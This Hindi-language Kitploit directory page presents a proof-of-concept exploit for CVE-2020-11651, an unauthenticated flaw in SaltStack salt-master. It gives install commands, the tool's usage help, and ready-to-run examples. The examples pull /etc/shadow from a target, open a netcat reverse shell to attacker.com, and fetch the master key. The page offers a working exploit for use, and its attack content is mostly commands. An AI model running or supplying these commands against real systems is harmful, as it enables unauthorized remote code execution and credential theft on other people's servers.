Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/0xc0d/cve-2020-11651
भेद्यता विश्लेषणशोषणडेटा निष्कासनपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरिमोट एक्सेस टूल
GitHub0xc0d/cve-2020-11651

CVE-2020-11651

CVE-2020-11651: अवधारणा का प्रमाण

रिपॉजिटरी देखें
401425 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2020-11651

SaltStack Salt के 2019.2.4 से पहले और 3000 के 3000.2 से पहले के संस्करणों में एक समस्या पाई गई। salt-master प्रक्रिया का ClearFuncs वर्ग मेथड कॉल को उचित रूप से मान्य नहीं करता। इससे एक दूरस्थ उपयोक्ता बिना प्रमाणीकरण के कुछ मेथड्स तक पहुँच सकता है। इन मेथड्स का उपयोग salt master से उपयोक्ता टोकन प्राप्त करने और/या salt minions पर मनमानी कमांड चलाने के लिए किया जा सकता है।

विवरण

पैच असमर्थित salt संस्करणों के लिए

स्थापना

root@kitploit:~
git clone https://github.com/0xc0d/CVE-2020-11651.git ~/CVE-2020-11651
chmod +x ~/CVE-2020-11651/PoC.py

उपयोग

root@kitploit:~
$ ~/CVE-2020-11651/PoC.py -h
usage: PoC.py [-h] --host HOST [--port PORT] [--execute COMMAND] [--upload src dest] [--download src dest] [--minions] [--quiet] [--fetch-key-only]

CVE-2020-11651 PoC

optional arguments:
  -h, --help            show this help message and exit
  --host HOST, -t HOST
  --port PORT, -p PORT
  --execute COMMAND, -e COMMAND
                        Command to execute. Defaul: /bin/sh (use netcat for reverse shell)
  --upload src dest, -u src dest
                        Upload a file
  --download src dest, -d src dest
                        Download a file
  --minions             Send command to all minions on master
  --quiet, -q           Enable quiet/silent mode
  --fetch-key-only      Only fetch the key

उदाहरण

छाया फ़ाइल डाउनलोड करें

root@kitploit:~
./PoC.py --host target.com --download /etc/shadow ./shadow

रिवर्स शेल चलाएँ

root@kitploit:~
nc -nvl attacker.com 9999
./PoC.py --host target.com --execute "nc attacker.com 9999 -e \"/bin/sh\""

की प्राप्त करें

root@kitploit:~
./PoC.py --host target.com --fetch-key-only
टूल डाउनलोड करें